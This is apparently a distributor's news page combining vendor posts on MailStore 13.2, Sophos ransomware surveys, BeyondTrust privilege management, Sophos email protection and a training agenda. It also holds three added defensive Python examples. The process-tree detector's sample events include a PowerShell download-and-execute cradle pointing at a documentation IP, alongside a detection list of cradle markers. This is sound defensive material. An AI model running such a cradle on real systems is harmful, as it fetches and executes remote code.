News
Five months after the last release, our new MailStore Server Version 13.2 is ready to hit the market! Recent versions concentrated on data security; Version 13.2 puts another aspect of our email archiving solutions, performance, in the spotlight. The new release brings a significant performance gain in many areas of the software, and that gain has in turn allowed a sizable increase in the maximum number of users permitted in a single installation of MailStore Server®, which is targeted at small and mid-sized businesses. Let’s take a look at the details.
What Are the Benefits of Version 13.2?
Enhanced Performance: Faster Than Ever
This time, the main focus is product performance. Since releasing the last version, we’ve tweaked a few things under the hood, so to speak, and customers and users of all three email archiving solutions MailStore Server, the MailStore Service Provider Edition (SPE), and MailStore Home® can look forward to a major increase in performance.
“The boost in performance is perceptible in several areas of the software: for example, the process of rebuilding search indexes is much faster than it was before in all three archiving solutions,” enthuses Heiko Borchardt, Sales Engineer at MailStore Software GmbH. “As a member of the technical support team, I’m in contact with our customers on a daily basis and appreciate that a hike in performance not only delivers technical benefits, but enhances the user experience as well. Our customers are going to be really pleased with this.”
The new release introduces changes such as improved performance when reading recovery records, and performance-optimizing configuration options for archive stores (the latter only applies to MailStore Server and the MailStore SPE). While on the subject of archive stores, you’ll find a blog post with all the details here.
MailStore Server Can Now Be Used by Businesses With up to 2,000 Users
The significant increase in performance of our email archiving solutions comes with another piece of good news: building on other improvements introduced in recent years, MailStore Server can now be used by businesses with up to 2,000 users (if you have any questions about the system requirements, please contact our support team).
“Depending on the individual IT environment and email volume, our general recommendation was to have no more than 500 users in any single MailStore Server installation,” says Björn Meyn, Product Manager at MailStore Software GmbH. “So we’re really pleased, after extensive testing, to have been able to augment the user limit so significantly in Version 13.2. And our resellers also stand to benefit from this development.”
Other Improvements
In addition to the two highlights, enhanced performance and the raised user limit, Version 13.2 comes with other improvements. For example, administrators of the MailStore SPE can now activate their installation and run license reporting through a conventional (i.e. non-transparent) proxy. Indexing of PDF attachments is now built into all products, eliminating the need to install external iFilters. Also, the .NET Core runtime embedded in MailStore Gateway has been upgraded so that the component runs on a currently supported, patched release.
GDPR-Certified
As usual, we’ve had our business solutions MailStore Server and the MailStore SPE audited and certified by an independent data protection expert.
The audit was based on the General Data Protection Regulation (GDPR). This demonstrates that, when used appropriately, MailStore Server and the MailStore SPE meet all relevant requirements governing the processing of personal data set out in the GDPR.
You can request a copy of the official audit certificate from sales@mailstore.com. Registered MailStore partners can download the certificates from our Partner Portal or request it by email from partners@mailstore.com.
Availability
You can download MailStore Server, the MailStore SPE, and MailStore Gateway right now from the company website free of charge. Are you having problems updating to the latest version because your MailStore Server Update & Support Service has expired? If so, please get in touch with us to obtain an upgrade that will allow you to use the latest version of MailStore Server. It makes sense to have an active Update & Support Service for other reasons, too. Click here for a summary of the key arguments.
Interested companies can also download Version 13.2 as part of a free, 30-day trial.
Service providers interested in the MailStore SPE can register here free of charge to obtain all the relevant information, including access to a free trial version.
Home users can download the latest version of MailStore Home free of charge from the Products page of our website.
Source: MailStore
Our new report, The State of Ransomware in Manufacturing and Production 2021, reveals that, of all the industries surveyed, companies in this sector are the least likely to submit to a ransom demand and the most likely to restore encrypted data from backups. Just 19% of organizations whose data was encrypted paid attackers to decrypt their files, compared with a global average of 32%.
The report is based on the findings from an independent survey of 5,400 IT decision makers, including 438 in the manufacturing and production sector, conducted at the start of 2021.
Evolving attacker techniques
Overall, 36% of the manufacturing and production organizations surveyed were hit by ransomware last year, in line with the global average of 37%. Fortunately for this sector, 68% of those whose data was encrypted were able to restore it from backups, considerably above the global average of 57%. This ability to restore data from backups lets many companies refuse attacker demands, which explains the low ransom payment rate.
9% of ransomware victims were hit with extortion-based attacks, a pressure technique where attackers don’t encrypt files, but rather threaten to leak stolen information online if a ransom demand isn’t paid. This rate of extortion is higher than the global average of 7%, and may also be linked to the high use of backups which forces adversaries to find other approaches to make money from victims.
Chester Wisniewski, principal research scientist at Sophos, advises that “backups are vital, but they cannot protect against this risk, so manufacturing and production businesses should not rely on them as an anti-extortion defense. Organizations need to extend their anti-ransomware defenses by combining technology with human-led threat hunting to neutralize today’s advanced human-led cyberattacks.”
The cost of ransomware
The overall cost to manufacturing and production organizations to recover from a ransomware attack last year was, on average, $1.52 million. While this is a very considerable sum, it is less than the global average of $1.85 million. Again, the ability to restore data from backups likely plays a part in keeping recovery costs down.
Fears for the future
While manufacturing and production companies show good resilience in the face of ransomware, the survey revealed that they have the highest expectation of a future attack of all sectors. Of the respondents not hit by ransomware last year, 77% expect to be hit in the future. The sophistication and prevalence of ransomware are the key factors driving this concern.
A sector heavily impacted by the pandemic
IT teams in manufacturing and production were severely affected by the challenges of 2020. This sector was the least likely to experience a decrease in cybersecurity workload over 2020: just 7% said their cyber workload had decreased, vs. a global average of 13%. It also had the fewest respondents who saw improved response time to IT cases (15% vs. a global average of 20%). The silver lining is that cyber skills also increased, with 71% of respondents saying their team’s ability to further develop cybersecurity knowledge and skills increased over 2020.
Learn more
Download the full report to explore the reality of ransomware in manufacturing and production. It also includes recommendations from Sophos experts to minimize the impact of ransomware in future.
Source: Sophos
Privileged Access & Session Management from BeyondTrust
As the 2020 pandemic changed the traditional way of working, companies were forced to adapt by starting to fully support remote work. As the vaccine rollout continues, quite a few companies have started welcoming employees back to the office. That does not mean, however, that every company plans to return to exactly the way things were before.
Wherever your company is in the next wave of work, creating a plan that addresses the physical, digital and human elements will keep your data secure and your people healthy.
“80% of breaches are the result of the abuse or misuse of privileged credentials”
PAM remains a high priority, as several high-profile breaches are linked to compromised or stolen privileged account credentials.
Add to that the accelerating move to the cloud, the blurring of enterprise security perimeters and the overall increase in the number of cyberattacks, and together they all contribute to the growth in PAM adoption.
This is consistent with what BeyondTrust has seen over the past year, as organizations continue to adopt and evolve their PAM solutions beyond basic PASM products to include Privilege Elevation and Delegation Management (PEDM), secrets management and privileged remote access solutions. BeyondTrust offers the broadest PAM product portfolio on the market, with particular strength in PEDM (Privilege Elevation & Delegation) for Windows, Mac, Unix and Linux.
Organizations recognize that securing remote access is essential for the new normal of work-from-anywhere (WFA), hybrid work and accelerated digital transformation.
BeyondTrust captured the secure remote access market and continues to lead it, with mature privileged remote access and remote support products that are years ahead of other PAM vendors’ products in the depth and breadth of their capabilities.
Securing OT (Operational Technology) networks in focus
In its Magic Quadrant™ for Privileged Access Management, Gartner highlights the growing need and demand to extend privileged access management to OT environments. Although PAM is usually a horizontal solution, with growing demand from healthcare, manufacturing and natural resources, a new “vertical” need for specific features has emerged from organizations that use IoT and OT. These include utilities and energy companies as well as hospitals. Such organizations need to protect privileged access to their supervisory control and data acquisition (SCADA) and OT devices, and require pre-built connectors to popular OT systems.
BeyondTrust’s PAM solutions work in an integrated way to unify control across your entire universe of privileges and drastically reduce the attack surface. The ability to protect every privileged user (human, machine, vendor, employee), every asset and every session through the PAM platform makes BeyondTrust the best PAM vendor to partner with, as organizations are called on to operate in the new normal with privileges multiplied many times over.
NSS is an international Value Added Distributor (VAD) of high-technology IT solutions with a strategic partnership with BeyondTrust, a global leader in Privileged Access Management and Secure Remote Access, and is able to make full use of BeyondTrust’s Universal Privilege Management model, combining its expertise and deep knowledge of the market.
You can contact us at sales@nss.gr or on +30 211 8000 330.
Learn more about BeyondTrust PAM
Book Your Certification Today! (email sales@nss.gr with the subject “Sophos XG Administration Training”)
This course is designed for technical professionals who will be administering Sophos XG Firewall and provides the skills necessary to manage common day-to-day tasks.
On completion of this course, trainees will be able to:
- Explain how XG Firewall helps to protect against security threats
- Configure firewall rules, policies and user authentication
- Demonstrate threat protection and commonly used features
- Perform the initial setup of an XG Firewall and configure the required network settings
- Identify and use troubleshooting tools, reporting and management tasks
Prerequisites
There are no prerequisites for this course; however, it is recommended that you:
- Have knowledge of networking
- Are familiar with security best practices
- Have experience configuring network security devices
Certification
To become a Sophos Certified Administrator, trainees must take and pass an online assessment. The assessment tests their knowledge of both the presented and practical content. The pass mark for the assessment is 80%, and candidates are limited to 4 attempts.
Content
- Module 1: XG Firewall Overview
- Module 2: Getting started with XG Firewall
- Module 3: Network Protection
- Module 4: Webserver Protection
- Module 5: Site to Site Connections
- Module 6: Authentication
- Module 7: Web Protection and Application Control
- Module 8: Application Control
- Module 9: Email Protection
- Module 10: Wireless Protection
- Module 11: Remote Access
- Module 12: Logging, Reporting and Central Management
Certification
+ exam: Sophos XG Administrator
Duration
2 days + Labs
Agenda
Trainer: Micheal Eleftheroglou
Day 1 Tuesday 26 October 2021
9:30-10:30 Module 1: XG Firewall Overview
10:30-10:45 Break
10:45-12:30 Module 2: Getting started with XG Firewall
12:30-13:00 Labs (getting familiar)
13:00-13:30 Lunch
13:30-14:30 Module 3: Network Protection
14:30-15:30 Module 4: Webserver Protection
15:30-15:45 Break
15:45-17:05 Module 5: Site to Site Connections
Day 2 Wednesday 27 October 2021
9:00-10:20 Module 6: Authentication
10:20-11:20 Module 7: Web Protection and Application Control
11:20-11:30 Break
11:30-12:00 Module 8: Application Control
12:00-12:50 Module 9: Email Protection
12:50-13:30 Lunch
13:30-14:15 Module 10: Wireless Protection
14:15-15:05 Module 11: Remote Access
15:05-15:20 Break
15:20-16:20 Module 12: Logging, Reporting and Central Management
16:20 Labs discussion
Ransomware is very much a reality for the finance industry, as revealed in Sophos’ State of Ransomware in Financial Services 2021 report. Based on an independent survey of 550 IT decision makers, it explores the extent and impact of ransomware attacks on mid-sized finance organizations worldwide during 2020.
Overall, 34% of the financial services organizations surveyed were hit by ransomware in 2020, and 51% of the organizations impacted said the attackers succeeded in encrypting their data.
Preparation pays off
A quarter (25%) of financial services organizations whose data was encrypted paid the ransom to get their data back. This is lower than the cross-sector average of 32%, and likely a result of the sector’s above average ability to restore data from backups.
It appears that financial services are reaping the benefits of having Business Continuity and Disaster Recovery (BC-DR) plans which prepare them for situations like a ransomware attack. Given that financial services organizations that paid the ransom got back just 63% of their data on average, companies are wise to focus on backups as their primary data recovery method.
Overall, the financial services sector stands out as the only sector where all organizations whose data was encrypted managed to get at least some of it back. Again, it’s likely that financial organizations’ disaster recovery work has prepared them well for a ransomware attack.
Winning the battle, losing the war
When it comes to the actual ransoms paid, financial services come in considerably below average, with an average payment of US$69,369 compared with the cross-sector average of US$170,404. (Note: the low number of financial services respondents to this question means the finding is indicative rather than statistically significant.)
The good news stops there, however. The overall ransomware recovery cost for financial services is around a quarter of a million dollars higher than the global average (US$2.10 million vs. US$1.85 million). This is likely due to high spending on remediation measures to keep operations running at all costs, and the high costs of data breach notification, reputational damage, and regulatory fines that all impact this sector. As John Shier, senior security advisor at Sophos, explains:
Strict guidelines in the financial services sector encourage strong defenses. Unfortunately, they also mean that a direct hit with ransomware is likely to be very costly for targeted organizations. If you add up the price of regulatory fines, rebuilding IT systems and stabilizing brand reputation, especially if customer data is lost, you can see why the survey found that recovery costs for mid-sized financial services organizations hit by ransomware in 2020 were in excess of $2 million.
A target for extortion-only attacks
Another worrying data point is the fact that a small, but significant, 8% of financial services organizations hit by ransomware experienced what are known as ‘extortion’ attacks, where data is not encrypted, but stolen and victims are threatened with the online publication of their data unless they pay the ransom. Backups cannot protect against this risk, so financial services organizations should not rely on them as an anti-extortion defense.
Read the full report
To learn more about the impact of ransomware on finance, read the full State of Ransomware in Financial Services 2021 report.
Source: Sophos
To protect your users’ inboxes from phishing, look no further than Sophos Email. Alongside advanced anti-spam and malware protection powered by SophosLabs, Sophos Email includes multiple layers of technology to keep your email phish-free.
Advanced machine learning identifies phishing imposters and BEC attacks
Criminals often impersonate key individuals in an organization to trick other employees into falling for their scams. Sophos Email uses advanced machine learning to detect targeted impersonation and Business Email Compromise attacks. Utilizing the deep learning neural network created by Sophos AI, Sophos Email analyzes email body content and subject lines for tone and wording to identify suspicious conversations.
For added protection, Sophos Email also includes a setup assistant that integrates with AD Sync to automatically identify the individuals within an organization who are most likely to be impersonated. It scans all inbound mail for display name variations associated with those users, further extending protection against phishing imposters.
Real-time scanning blocks social engineering techniques
Adversaries are experts at using social engineering in their attacks. That’s why Sophos Email scans all inbound messages in real time for key phishing indicators such as brand spoofing and impersonation attempts, using SPF, DKIM and DMARC authentication results together with email header anomaly analysis. It spots and blocks phishing emails before they reach your users.
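The alignment check and display-name matching described in the two passages above, as an added example that is not Sophos Email code: it parses the Authentication-Results header an MX stamps on inbound mail, requires the passing SPF or DKIM identifier to align with the From: domain the way DMARC does, compares the display name against a list of likely-impersonated people, and flags a Reply-To that points to another organization. The protected-people list stands in for what AD Sync would supply, the organizational-domain rule is a simplification of the Public Suffix List, and the three messages are constructed.

```python
"""Inbound-mail phishing indicators: DMARC-style identifier alignment on
SPF/DKIM results, display-name impersonation, and a Reply-To anomaly.
Added example, not Sophos code. The protected-people list stands in for
what AD Sync would supply; the messages below are constructed."""
import re
from difflib import SequenceMatcher
from email import message_from_string
from email.utils import parseaddr

OUR_DOMAIN = "example.com"                               # assumption
PROTECTED_PEOPLE = {"Jane Doe": "jane.doe@example.com"}  # assumption: from AD Sync


def org_domain(domain: str) -> str:
    """Organizational domain used for relaxed alignment. Simplification:
    the last two labels; real code should consult the Public Suffix List."""
    labels = domain.lower().rstrip(".").split(".")
    return ".".join(labels[-2:])


def parse_auth_results(header: str) -> dict:
    """Parse an Authentication-Results header (RFC 8601) into
    {'spf': {'result': 'pass', 'smtp.mailfrom': ...}, 'dkim': {...}, ...}."""
    results = {}
    for clause in header.split(";")[1:]:        # clause 0 is the authserv-id
        m = re.match(r"\s*(spf|dkim|dmarc)=(\w+)(.*)", clause, re.S)
        if m:
            method, result, rest = m.groups()
            props = dict(re.findall(r"([\w.]+)=(\S+)", rest))
            results[method] = {"result": result.lower(), **props}
    return results


def phishing_indicators(raw_message: str) -> dict:
    msg = message_from_string(raw_message)
    display, addr = parseaddr(msg.get("From", ""))
    from_domain = addr.rpartition("@")[2].lower()
    auth = parse_auth_results(msg.get("Authentication-Results", ""))
    findings = []

    # 1. Authentication with identifier alignment, as DMARC requires: SPF must
    #    pass for a MAIL FROM domain aligned with From:, or DKIM must pass with
    #    an aligned d=. SPF passing for the attacker's own domain does not count.
    spf, dkim = auth.get("spf", {}), auth.get("dkim", {})
    spf_domain = spf.get("smtp.mailfrom", "").rpartition("@")[2]
    spf_aligned = spf.get("result") == "pass" and org_domain(spf_domain) == org_domain(from_domain)
    dkim_aligned = dkim.get("result") == "pass" and org_domain(dkim.get("header.d", "")) == org_domain(from_domain)
    if not (spf_aligned or dkim_aligned):
        findings.append("own-domain-spoof" if org_domain(from_domain) == OUR_DOMAIN
                        else "unaligned-authentication")

    # 2. Display-name impersonation: looks like a protected person, but the
    #    address is not theirs (lookalike domains and free-mail accounts alike).
    for name, real_addr in PROTECTED_PEOPLE.items():
        similarity = SequenceMatcher(None, display.lower(), name.lower()).ratio()
        if similarity >= 0.8 and addr.lower() != real_addr:
            findings.append(f"display-name-impersonation:{name}")

    # 3. Header anomaly: replies are steered to a different organization.
    reply_domain = parseaddr(msg.get("Reply-To", ""))[1].rpartition("@")[2].lower()
    if reply_domain and org_domain(reply_domain) != org_domain(from_domain):
        findings.append("reply-to-domain-mismatch")

    return {"from": addr, "findings": findings, "suspicious": bool(findings)}


# Constructed sample messages (not real traffic). Authentication-Results is
# what the receiving MX would have stamped before handing the mail over.
LEGIT = """\
From: Jane Doe <jane.doe@example.com>
To: bob@example.com
Authentication-Results: mx.example.com; spf=pass smtp.mailfrom=jane.doe@example.com; dkim=pass header.d=example.com; dmarc=pass header.from=example.com
Subject: Q3 figures

Attached.
"""

IMPERSONATION = """\
From: Jane Doe <jane.doe.ceo@webmail-lookalike.net>
To: bob@example.com
Reply-To: payments@finance-urgent.net
Authentication-Results: mx.example.com; spf=pass smtp.mailfrom=jane.doe.ceo@webmail-lookalike.net; dkim=none
Subject: Urgent wire transfer

Please process today, I am in a meeting.
"""

SPOOF = """\
From: Jane Doe <jane.doe@example.com>
To: bob@example.com
Authentication-Results: mx.example.com; spf=pass smtp.mailfrom=bounce@bulk-sender.net; dkim=fail header.d=example.com
Subject: Password reset required

Click the link below.
"""
```

The second message is the instructive one: the attacker’s own domain passes SPF with perfect alignment, so authentication alone says nothing, and only the display-name and Reply-To checks catch it. The third shows the opposite case, a spoof of the organization’s own domain that SPF and DKIM expose.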
Pre and post delivery protection stops malicious links and malware
The danger with phishing is not the email itself but what it gets people to do. Phishing emails often include malicious links and malware that attackers try to trick you into activating. Sophos Email’s real-time URL scanning and AI-powered cloud sandbox protect against malicious URLs and attachments, ensuring malware never reaches your users’ inboxes.
To avoid detection, attackers sometimes change where a link leads after the email has landed in victims’ inboxes, for example by redirecting a previously safe URL to a malicious one or by inserting malware into a previously clean web page. Time-of-Click URL rewriting analyzes each URL at the moment it is clicked, and automatically removes dangerous emails, to protect against these post-delivery techniques.
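One way to implement time-of-click rewriting, as an added example rather than Sophos’ own implementation: every absolute link is replaced at delivery with a gateway URL, and the verdict is taken from current reputation data when the user clicks rather than when the mail arrived. The gateway host, the key and the reputation set are assumptions. The wrapper is HMAC-signed because an unsigned redirector would hand attackers an open redirect on a trusted domain.

```python
"""Time-of-click URL rewriting: links are wrapped at delivery so the verdict
is taken when the user clicks. Added example, not Sophos code; the gateway
host, key and reputation feed are assumptions."""
import hashlib
import hmac
import html
import re
from urllib.parse import parse_qs, urlencode, urlparse

GATEWAY = "https://clicktime.gateway.invalid/r"  # assumption: the rewrite host
KEY = b"constructed-demo-key"                     # assumption: per-tenant secret

# Constructed stand-in for a live reputation feed: hosts are added when a
# previously clean destination turns malicious after delivery.
BLOCKED_HOSTS: set = set()


def sign(url: str) -> str:
    """HMAC over the original URL; ties the wrapper to this gateway's key."""
    return hmac.new(KEY, url.encode("utf-8"), hashlib.sha256).hexdigest()


def wrap(url: str) -> str:
    """Delivery time: replace the destination with a signed gateway link."""
    return f"{GATEWAY}?{urlencode({'u': url, 's': sign(url)})}"


_HREF = re.compile(r"""(href\s*=\s*)(["'])(https?://[^"'\s]+)\2""", re.IGNORECASE)


def rewrite_html(body: str) -> str:
    """Rewrite every absolute http(s) href in an HTML body. The wrapped URL is
    HTML-escaped so the '&' between query parameters stays valid markup."""
    def repl(m):
        return f"{m.group(1)}{m.group(2)}{html.escape(wrap(m.group(3)), quote=True)}{m.group(2)}"
    return _HREF.sub(repl, body)


def resolve(click_url: str) -> tuple:
    """Click time: verify the signature, then re-evaluate the destination
    against the current reputation data before deciding to redirect."""
    q = parse_qs(urlparse(click_url).query)
    url = q.get("u", [""])[0]
    sig = q.get("s", [""])[0]
    if not sig or not hmac.compare_digest(sign(url), sig):
        return ("reject", "signature mismatch: not a link this gateway issued")
    host = (urlparse(url).hostname or "").lower()
    if host in BLOCKED_HOSTS:
        return ("block", url)
    return ("allow", url)


def demo() -> list:
    """Same link at three moments: clean at delivery, blocked after the host
    turns bad, rejected when someone forges the wrapper."""
    original = "https://docs.partner-portal.example/invoice/4471"
    body = f'<p>Your invoice: <a href="{original}">view</a></p>'
    wrapped = wrap(original)
    results = [rewrite_html(body), resolve(wrapped)[0]]
    BLOCKED_HOSTS.add("docs.partner-portal.example")   # reputation changes post-delivery
    results.append(resolve(wrapped)[0])
    forged = wrapped.replace("invoice", "attacker")    # tampered destination, stale signature
    results.append(resolve(forged)[0])
    return results
```

The point of the signature is not secrecy of the destination but integrity: the gateway will only follow links it issued, so the rewriting host cannot be borrowed by a phisher to lend a trusted domain to an arbitrary URL.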
Sophos Email’s Search and Destroy capabilities take this one step further, directly accessing Office 365 mailboxes, to identify and automatically remove emails containing malicious links and malware at the point the threat state changes and before a user ever clicks on them.
Learn more
To find out more head to sophos.com/email. You can start a free trial directly from our website, and if you’re already using Sophos Central you can activate a trial directly within your console in just two clicks.
Source: Sophos
BeyondTrust has just published our Malware Threat Report 2021, produced by the BeyondTrust Labs team, with collaboration from customers and incident response teams using BeyondTrust solutions. The report is based on real-world monitoring and analysis of attacks between Q1 2020 and Q1 2021, and also involves the testing of 150 recent malware strains against the MITRE ATT&CK Framework.
Here are a few key findings published in the report:
- Fileless threats are increasing and being leveraged in the initial attack stages until a strong foothold and persistence mechanism is established and security controls have been disabled.
- Malware-as-a-service (MaaS) is becoming a preferred threat actor model, leading to specialization in the production of malware tools that can be purchased and deployed along various stages of the attack chain.
- The MITRE ATT&CK Framework provides an effective way to distill a wide range of malware strains and cyberattacks into component techniques, which can then be mitigated.
- BeyondTrust’s out-of-the-box policies proactively disrupted all 150 different, common attack chains tested in our analysis.
- Removal of admin rights and implementation of pragmatic application control are two of the most effective security controls for preventing and mitigating the most common malware threats seen today.
Read on for some more highlights on the report, including reoccurring threat themes, and the effectiveness of privilege management at preventing and mitigating cyber threats. You can also download the full report here.
Maturity of the Malware Ecosystem
Cybercrime is a high-growth industry that is constantly evolving with regard to malware ecosystems and their economic models. Parallel to legitimate software companies and the trend towards SaaS, threat actors are shifting to malware-as-a-service models, with specialists emerging in different areas, including enterprise credential sales, initial access to a target organization, lateral movement capability, or payload delivery.
Today, there are often many different pieces of malware that come together in an attack. A modern ransomware attack could be comprised of multiple threat actors, tools, and platforms. For example:
- Threat actors rent the Necurs botnet and use it to distribute malicious spam.
- The spam contains malicious documents that launch Trickbot.
- Trickbot is used to harvest credentials, access emails, and for lateral movement across the network. The stolen data can be sold or used in later attacks.
- With widespread compromise of the target network, the threat actor sells backdoor access to the network to the highest bidder.
- The buyer then deploys RYUK ransomware via the Trickbot command and control servers.
As threat actors seek to maximize the disruption to organizations and extract the highest ransom payments, the ransomware model is shifting towards human-operated, enterprise-wide attacks.
Rather than create an automated worm that self-propagates across the network, the latest generation of ransomware-as-a-service (RaaS) will tread lightly, establishing a foothold in the network of a large organization. Using common penetration testing tools – such as Cobalt Strike or PowerShell Empire – they then survey the network and spread using privilege escalations to gain control of critical systems and disable security controls, before finally encrypting key systems and exfiltrating data.
PAM – A Powerful, Blended Defense Against Today’s Malware Threats
All too often, malware will not only use multiple techniques to evade detection, but will also exploit excessive privilege granted to end users to disable security controls, which completely undermines your defenses and security investment.
66% of the 58 techniques in the MITRE ATT&CK Framework either recommend using Privileged Account Management, User Account Management, and Application Control as mitigations or list Administrator / SYSTEM accounts as being a prerequisite for the technique to succeed.
Controlling privileges and preventing unauthorized application execution is therefore a key defensive measure against Cobalt Strike and tools or malware with similar capabilities: it reduces the attack surface and denies the code execution and privileged rights they depend on.
Lab-Testing BeyondTrust Trusted Application Protection Against Top Malware Strains
BeyondTrust’s Privilege Management for Windows product is designed to eliminate unnecessary privileges, strictly control privileged access, and provide pragmatic application control to proactively reduce the attack surface. Within this product is a unique Trusted Application Protection (TAP) feature, which provides an out-of-the-box policy designed to mitigate common attack techniques, including fileless threats, and to prevent high-risk applications such as web browsers, PDF viewers, Outlook, and Microsoft Office from being exploited.
Trusted Application Protection uses both privilege management and application control capabilities to prevent these high-risk applications from launching custom malware payloads. It also protects high-risk applications from more sophisticated DLL attack techniques, such as DLL injection, hijacking, and malicious DLL plugins.
To test the effectiveness of Trusted Application Protection, BeyondTrust Labs examined the attack chains of thousands of malware samples from the past year. While malware operators constantly change the content of their phishing emails, re-encode payloads to evade AV, and adopt new scripting techniques to hide their intent, there is far less variability in the attack chains they use.
As an example, a threat actor might use a range of document types and create hundreds of variants with unique file signatures. However, every variant will launch CMD, then run a script that pulls down a custom executable payload and launches it. While the document, the script, the website hosting the executable, and the payload may all change, the attack chain remains consistent.
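That consistent chain is what a detection should key on, rather than the hashes that change with every variant. The following is an added example, not BeyondTrust’s code: it walks parent-process links over constructed process-creation events (in the shape of Sysmon Event ID 1 fields) and raises an alert when a document-handling application is an ancestor of a command shell carrying a download cradle, or of an executable started from a user-writable path. Two benign events are included for contrast. The ATT&CK technique IDs attached to each alert are the standard ones for those behaviours; the marker lists and path prefixes are starting points, not a complete policy.

```python
"""Process-tree detection for the chain: Office document -> CMD -> script that
downloads a payload -> payload runs. Added example, not BeyondTrust code.
Events are constructed in the shape of Sysmon Event ID 1 (pid, ppid, image,
cmdline); nothing here is real telemetry."""

OFFICE_APPS = {"winword.exe", "excel.exe", "powerpnt.exe", "outlook.exe", "acrord32.exe"}
# Shell / script host -> ATT&CK sub-technique for that interpreter
SHELLS = {"cmd.exe": "T1059.003", "powershell.exe": "T1059.001", "pwsh.exe": "T1059.001",
          "wscript.exe": "T1059.005", "cscript.exe": "T1059.005", "mshta.exe": "T1218.005"}
# Substrings typical of download cradles and encoded commands (lower-cased match)
CRADLE_MARKERS = ("downloadstring", "downloadfile", "invoke-webrequest", "iwr ",
                  "curl ", "certutil", "bitsadmin", "frombase64string", " -enc")
# Locations a document-driven chain typically drops its executable into
USER_WRITABLE = ("\\appdata\\", "\\temp\\", "\\downloads\\", "\\users\\public\\")


def _name(image: str) -> str:
    return image.rsplit("\\", 1)[-1].lower()


def ancestry(event: dict, by_pid: dict) -> list:
    """Walk ppid links upward; returns [event, parent, grandparent, ...]."""
    chain, seen = [event], {event["pid"]}
    while event["ppid"] in by_pid and event["ppid"] not in seen:
        event = by_pid[event["ppid"]]
        seen.add(event["pid"])
        chain.append(event)
    return chain


def detect(events: list) -> list:
    by_pid = {e["pid"]: e for e in events}
    alerts = []
    for e in events:
        chain = ancestry(e, by_pid)
        names = [_name(p["image"]) for p in chain]
        if not any(n in OFFICE_APPS for n in names[1:]):
            continue  # only chains rooted in a document-handling application
        me, cmd = names[0], e["cmdline"].lower()
        techniques = ["T1204.002"]  # Malicious File: a document started this chain
        if me in SHELLS:
            techniques.append(SHELLS[me])
            rule = "office-spawned-shell"
            if any(m in cmd for m in CRADLE_MARKERS):
                rule, techniques = "download-cradle-from-office", techniques + ["T1105"]
        elif any(seg in e["image"].lower() for seg in USER_WRITABLE):
            rule = "payload-launched-from-user-path"
        else:
            continue  # e.g. print-spooler helpers Word legitimately spawns
        alerts.append({"rule": rule, "pid": e["pid"], "attack": techniques,
                       "chain": " -> ".join(reversed(names))})
    return alerts


# Constructed events. 203.0.113.0/24 is a documentation range, not a real host.
EVENTS = [
    {"pid": 100, "ppid": 1, "image": r"C:\Windows\explorer.exe", "cmdline": "explorer.exe"},
    {"pid": 200, "ppid": 100, "image": r"C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXE",
     "cmdline": r'"WINWORD.EXE" /n "C:\Users\bob\Downloads\invoice_4471.docm"'},
    {"pid": 300, "ppid": 200, "image": r"C:\Windows\System32\cmd.exe",
     "cmdline": r"cmd.exe /c powershell -nop -w hidden -ep bypass -c IEX((New-Object Net.WebClient).DownloadString('http://203.0.113.10/s.ps1'))"},
    {"pid": 400, "ppid": 300, "image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "cmdline": r"powershell -nop -w hidden -ep bypass -c IEX((New-Object Net.WebClient).DownloadString('http://203.0.113.10/s.ps1'))"},
    {"pid": 500, "ppid": 400, "image": r"C:\Users\bob\AppData\Local\Temp\svchost_update.exe",
     "cmdline": "svchost_update.exe"},
    # Benign for contrast: Word's print helper, and an admin shell from Explorer
    {"pid": 600, "ppid": 200, "image": r"C:\Windows\splwow64.exe", "cmdline": "splwow64.exe"},
    {"pid": 700, "ppid": 100, "image": r"C:\Windows\System32\cmd.exe", "cmdline": "cmd.exe /c dir"},
]


def summarize(events: list = EVENTS) -> dict:
    """pid -> rule, for a quick view of which links of the chain fired."""
    return {a["pid"]: a["rule"] for a in detect(events)}
```

Each link of the chain produces its own alert, which is deliberate: the cmd.exe event fires even though the payload has not yet been fetched, so a response that kills the chain there prevents the download. The same ancestry walk is what an application-control policy of the TAP kind enforces preventively, by refusing to let the shell or the dropped executable start at all.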
For our analysis, we distilled 150 malware samples that represent the attack chains of some of the most prolific malware threats of 2020 – 2021. As you might expect, the most successful malware families tend to vary their attack chains, resulting in a higher number of samples.
As published in the Malware Threat Report 2021, our analysis clearly demonstrates the effectiveness of endpoint privilege management, such as the BeyondTrust Privilege Management for Windows & Mac and Privilege Management for Unix & Linux products, in proactively stopping these threats and potential future threats that leverage similar attack chains.
With that said, no one solution can be the sole basis for a strong endpoint security strategy; it takes an ecosystem of solutions working in tandem.
For more findings on how BeyondTrust can help mitigate the most recent malware strains, download the BeyondTrust Labs Malware Threat Report 2021.
Source: BeyondTrust
Phishing is still an effective cyberattack technique because it constantly evolves. To keep up, your phishing defenses need to evolve too.
Our new report, Phishing Insights 2021, reveals the state of phishing and cybersecurity user education based on an independent survey of 5,400 IT professionals. Use it to evaluate your own phishing security posture and identify opportunities to evolve your defenses.
It also provides a real-world case study of a phishing email that led to a multi-million dollar ransomware attack.
Phishing means different things to different people
What is phishing? One of the findings from the survey is that even among IT professionals there is wide variation in what people consider to be a phishing attack. The most common understanding is emails that falsely claim to be from a legitimate organization, usually combined with a threat or a request for information. While this was the most popular answer, fewer than six in ten (57%) respondents selected this option, illustrating the breadth of meanings attached to the term phishing.
46% of respondents consider Business Email Compromise (BEC) attacks to be phishing, while over a third (36%) understand phishing to include threadjacking, i.e. when attackers insert themselves into a legitimate email thread as part of an attack.
With this extensive variation in understanding of phishing attacks among IT professionals, it’s reasonable to expect a similar or greater range of interpretations among non-IT employees.
This is a useful reminder to be mindful of the different interpretations of the word ‘phishing’ when providing educational resources and user awareness training. Without the correct context, the training will be less effective.
Phishing has increased since the pandemic
70% of survey respondents reported an increase in phishing attacks on their organization since the start of the pandemic. All sectors were affected, with central government experiencing the highest increase (77%), closely followed by business and professional services (76%) and healthcare (73%).
Fortunately, 98% of organizations had their phishing awareness program in place before COVID-19 hit. Thanks to these programs, employees will have been well placed to withstand the barrage of phishing emails over the last year.
While this is good news, it’s also a reminder to regularly review and update phishing awareness materials and activities to keep them fresh and relevant.
Case study: From phish to multi-million-dollar ransomware attack
Invariably, phishing is just one part of a cyberattack. When a victim falls for a phish, it sets off a chain of events that can lead to a devastating attack many weeks or months later.
The Sophos Rapid Response team was recently called in to assist a company experiencing a major ransomware attack that started with a phishing email. As the timeline shows, three months passed between the initial phish and the release of the ransomware payload, with multiple adversaries playing different roles in the attack.
